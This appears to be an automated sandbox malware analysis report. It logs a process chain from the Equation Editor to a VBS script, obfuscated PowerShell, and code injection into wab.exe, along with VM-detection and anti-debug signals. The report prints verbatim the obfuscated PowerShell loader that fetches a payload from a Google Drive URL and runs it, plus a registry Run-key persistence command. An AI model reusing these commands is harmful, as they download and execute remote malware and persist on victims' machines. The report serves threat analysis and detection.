Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3636	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe TID: 3876	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1196	Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1652	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1356	Thread sleep count: 3028 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1356	Thread sleep count: 2272 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3416	Thread sleep time: -420000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3472	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 1544	Thread sleep time: -1200000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -1800000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -540042s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -599838s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -599697s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -480060s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -119938s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -420140s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -119969s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -100000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -79783s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -80245s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 804	Thread sleep time: -60268s >= -30000s
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe TID: 3824	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4088	Thread sleep time: -540000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -3600000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -1800000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -1100000s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -80338s >= -30000s
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 3648	Thread sleep time: -80422s >= -30000s

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 594727	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 540167	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599978	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 79813	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 59980	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 39971	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 540042
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599838
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599697
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 480060
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 119938
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 420140
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 119969
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 79783
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 80245
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 60268
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1800000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 1800000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 80338
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 80422

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu

Source: powershell.exe, 00000007.00000002.476529578.00000000009C0000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: *WsHGFs

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_0062B8A6 mov edx, dword ptr fs:[00000030h]	2_2_0062B8A6
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0B92 mov edx, dword ptr fs:[00000030h]	22_2_07DE0B92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0B41 mov edx, dword ptr fs:[00000030h]	22_2_07DE0B41
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DCC mov eax, dword ptr fs:[00000030h]	22_2_07DE0DCC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DE0 mov ebx, dword ptr fs:[00000030h]	22_2_07DE0DE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DE0 mov ebx, dword ptr fs:[00000030h]	22_2_07DE0DE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DE0 mov ebx, dword ptr fs:[00000030h]	22_2_07DE0DE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 22_2_07DE0DE0 mov ebx, dword ptr fs:[00000030h]	22_2_07DE0DE0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe

Code function: 24_2_005A2F5B GetProcessHeap,HeapAlloc,memcpy,GetProcessHeap,HeapFree,

24_2_005A2F5B

Enables debug privileges

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 24_2_005A2AC1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		24_2_005A2AC1
Source: C:\Users\user\AppData\Roaming\FTSKIaM\FTSKIaM.exe	Code function: 31_2_005B2AC1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		31_2_005B2AC1

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 16F0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 27FE1C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 1720000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2AF94C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 17A0000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2EFD4C

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magicremoihohj75.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Langshans225 = 1;$Forandringssaetninger='Substrin';$Forandringssaetninger+='g';Function Thysanoura($Agentens){$Oncography=$Agentens.Length-$Langshans225;For($Preindisposing=5; $Preindisposing -lt $Oncography; $Preindisposing+=(6)){$Bugtningernes+=$Agentens.$Forandringssaetninger.Invoke($Preindisposing, $Langshans225);}$Bugtningernes;}function Dryptrrendes($Eksportpriserne){& ($Peridot) ($Eksportpriserne);}$Hjlpevariabels=Thysanoura 'tilbuMIndseo autozDiscoi tenolAnskulFo.tjaSolce/Nere 5 Pie.. Comp0 Dana St mm(PaafyW PleniNonden ehngdOmbyto NebewHindespost, .ooscNIsomeT,akul Fin h1Uriel0.uzzl.Tangs0Squal;Apart OmgreWPiratiBou,inShape6Uprid4Inspe;Un.il A,elpxBana,6Fo,ur4Promi;Pro s Gemmr U snvOuts :Sikri1Eu,as2Polac1reill.ardor0 Mett)Ultra MichGPra ie Salac HuddkLituroTaxon/Demor2 Hu t0Caeom1 He r0 Wri 0.nsum1Forma0vattp1Horiz .etjeF.gedaiAs uerProgreObersfObtecoKarikxDe,at/Pull,1Pwcat2.besk1Am.rb..nwid0 Fond ';$Epiphyll=Thysanoura ' triuULimmasEnefoeF,rklrShack-Tr,nsA SithgTi.sreLgstrnMennet Unbe ';$Jellab=Thysanoura ' Ma.ehPlusgtTilskt HekspSports P.ed: Meri/Propo/rabardSarodr DithiBrystv,fikke Rele..vrfagCaukfoCo umoMiljvgF,glelB,rgaeVacuu.SmidicBetleoPolyamTessa/EntrauConstcDamef?Aftjee ynebxLnkamp,inero OpvarIntegtVaria=SampldPiloboAnnitwPo.denforbrlMegacoTrvlearo kedFor i&Ho.seiGjortdPrint= Ener1Domi,H,nter8 EnnovAccru0 Tan.ZSpr t9,rsteqS.mle8Inte Bun,reOSp.tt4UnfavU KnapTSpindEMete NDornukAtavibF,rsiTMetalaSl ngiNycteWHei.spSpinocSuperiKroke8OpenhYUndiv0KongsjCe eaY isjRTheisnGu df3 Schl ';$Afprvendes=Thysanoura ' .ima>Ankny ';$Peridot=Thysanoura 'Un,ilikropeeFletnxPa.ah ';$Dysmorfismen = Thysanoura ' Amene ZimbcBesl.hGoddaoDrake Riba%OfferaSylt,pRdnbspAnlagdCrookaRenast EmbeaHoejr%,ones\UningddisiniChefkaLsdpelSagsko EluvgKonfiiHensys Delpt Be ui uffc Ram.. Du,oH.onsce H ndd Appa d,ivi& Caus&Grews DkseeHematc forsh ndeno Dans Couac$ Uret ';Dryptrrendes (Thysanoura ',eori$Omgrug arnel .ubloH.gleb rana FinllOppus:Ri,etIMindrnTiaartAfmr.ePsykorBlegsmUdfrsoAlumid ,misiPrivilpaperlTrykki SineoDoce nSlyng=Li,en( SangcTidsbmUnduld Tet C.nc/ Ha.dcvedre Sp y$PolypDOvervy SkumsKyurimTilbuoPremur AntifExperi delesExan mJernbe OvernJounc)opels ');Dryptrrendes (Thysanoura 'Pe.se$HexylgSpan,l Fusio .raubBejlea Udd.l .mer:Topo.OTu ehmWithhs ,plakFlankrn nehi.ybfrvPublie CrimnenzymdCheckeFor,ts Ove.=Dogmi$BebudJTotale S,belComprlGi.peaInputbTog,t.Ma tisRejempServilU.areiKop,lt Bund(Mamon$ SkobA ShopfWadmopUgedar AffavUnproeAblutnT,resdFejlreSvigesmisgr)Sjlss ');$Jellab=$Omskrivendes[0];Dryptrrendes (Thysanoura 'Mistr$IdeolgBlodtlDelkloTorc bKvadraOpruslKo ke:FriheD ulfaide.ras Ars pTilsyeS.attn SarrsVrel.aUndv,tHomagiForheoKiaatnVdderskine.sPe,veaKejseg de u=Phy,aN icroeCuculw Prec-AntliO actbStan jSr.kreSaltmcD ffetHalte MazemSForehySeisms Genet FireeGabesmFog.o.IrresN La.heSubsutg,rod.Snd rW SupreAkti bLsladCVedlalf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\dialogistic.Hed && echo $"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Chansonens% -w 1 $Hypokonderens=(Get-ItemProperty -Path 'HKCU:\Oversigtslisterne\').Incharity;%Chansonens% ($Hypokonderens)"
